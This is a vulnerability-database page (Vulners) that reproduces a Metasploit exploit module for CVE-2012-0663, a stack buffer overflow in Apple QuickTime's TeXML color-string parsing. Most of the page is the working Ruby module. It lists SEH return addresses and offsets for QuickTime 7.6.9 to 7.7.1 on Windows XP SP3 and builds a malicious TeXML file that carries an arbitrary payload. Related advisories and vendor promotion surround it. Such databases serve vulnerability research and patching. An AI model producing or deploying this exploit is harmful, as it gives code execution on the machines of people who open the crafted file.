Vulners
Lucene search
Apple QuickTime TeXML Stack Buffer Overflow
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | QuickTime < 7.7.2 Multiple Vulnerabilities | 18 May 201200:00 | – | nessus |
| QuickTime < 7.7.2 Multiple Vulnerabilities | 18 May 201200:00 | – | nessus |
| QuickTime < 7.7.2 Multiple Vulnerabilities (Windows) | 16 May 201200:00 | – | nessus |
 | CVE-2012-0663 Apple Quicktime Buffer Overflow | 16 May 201200:00 | – | attackerkb |
 | CVE-2012-0663 | 28 Jun 201200:00 | – | circl |
 | Apple QuickTime TeXML Color String Parsing Buffer Overflow (CVE-2012-0663) | 3 Sep 201200:00 | – | checkpoint_advisories |
| Apple QuickTime TeXML Transform Attribute Parsing Buffer Overflow (CVE-2012-0663) | 14 Oct 201200:00 | – | checkpoint_advisories |
| Apple QuickTime TeXML Color String Parsing Buffer Overflow - Improved Performance (CVE-2012-0663) | 9 May 201300:00 | – | checkpoint_advisories |
 | CVE-2012-0663 | 16 May 201201:00 | – | cve |
 | CVE-2012-0663 | 16 May 201201:00 | – | cvelist |
10
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. The flaw is
generally known as a bug while processing the 'transform' attribute, however,
that attack vector seems to only cause a TerminateProcess call due to a corrupt
stack cookie, and more data will only trigger a warning about the malformed XML
file. This module exploits the 'color' value instead, which accomplishes the same
thing.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', # Vulnerability Discovery
'sinn3r', # Metasploit Module
'juan vazquez' # Metasploit Module
],
'References' =>
[
[ 'OSVDB', '81934' ],
[ 'CVE', '2012-0663' ],
[ 'BID', '53571' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],
[ 'URL', 'http://support.apple.com/kb/HT1222' ]
],
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
},
'Platform' => 'win',
'Targets' =>
[
[ 'QuickTime 7.7.1 on Windows XP SP3',
{
'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.7.0 on Windows XP SP3',
{
'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.6.9 on Windows XP SP3',
{
'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
'Offset' => 643,
'Max' => 13508
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 15 2012'))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
], self.class)
end
def exploit
my_payload = rand_text(target['Offset'])
my_payload << generate_seh_record(target.ret)
my_payload << payload.encoded
my_payload << rand_text(target['Max'] - my_payload.length)
texml = <<-eos
<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-texml"?>
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
language="eng" timeScale="600"
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
<sample duration="2400" keyframe="true">
<description format="tx3g" displayFlags="ScrollIn"
horizontalJustification="Left"
verticalJustification="Top"
backgroundColor="0%, 0%, 0%, 100%">
<defaultTextBox x="0" y="0" width="176" height="60"/>
<fontTable>
<font id="1" name="Times"/>
</fontTable>
<sharedStyles>
<style id="1">
{font-table: 1} {font-size: 10}
{font-style:normal}
{font-weight: normal}
{color: #{my_payload}%, 100%, 100%, 100%}
</style>
</sharedStyles>
</description>
<sampleData scrollDelay="200"
highlightColor="25%, 45%, 65%, 100%"
targetEncoding="utf8">
<textBox x="10" y="10" width="156" height="40"/>
<text styleID="1">What you need... Metasploit!</text>
<highlight startMarker="1" endMarker="2"/>
<blink startMarker="3" endMarker="4"/>
</sampleData>
</sample>
</text3GTrack>
eos
texml = texml.gsub(/^\t\t/,'')
print_status("Creating '#{datastore['FILENAME']}'.")
file_create(texml)
end
end
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.69623